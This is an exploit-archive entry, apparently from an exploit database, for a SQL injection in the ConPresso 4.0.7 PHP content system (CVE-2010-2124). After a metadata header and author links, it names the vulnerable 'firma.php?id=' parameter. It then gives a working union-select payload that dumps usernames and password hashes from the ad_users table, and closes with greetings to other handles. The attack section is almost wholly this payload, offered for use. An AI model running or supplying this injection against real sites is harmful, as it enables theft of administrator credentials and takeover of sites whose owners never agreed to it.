ConPresso 4.0.7 - SQL Injection

Author: Gamoscu
type: webapps
platform: php
port: 
date_added: 2010-05-20 
date_updated:  
verified: 1 
codes: OSVDB-65060;CVE-2010-2124 
tags: 
aliases:  
screenshot_url:  
application_url: 

ConPresso 4.0.7 SQL Injection  Vulnerability

###########################

Author    : Gamoscu
Homepage  : http://www.1923turk.com
Blog      : http://gamoscu.wordpress.com/
Script    : ConPresso 4.0.7
Download  : http://www.conpresso.de/conpresso/de_downloads/index.php?rubric=Download

###########################

[ Vulnerable File ]

firma.php?id= [ SQL ]


[ XpL ]

-1/**/union/**/all/**/select/**/1,concat_ws(0x3a,password,username),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+ad_users




iyi ki dogdun DELiBEY


##############################################################
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################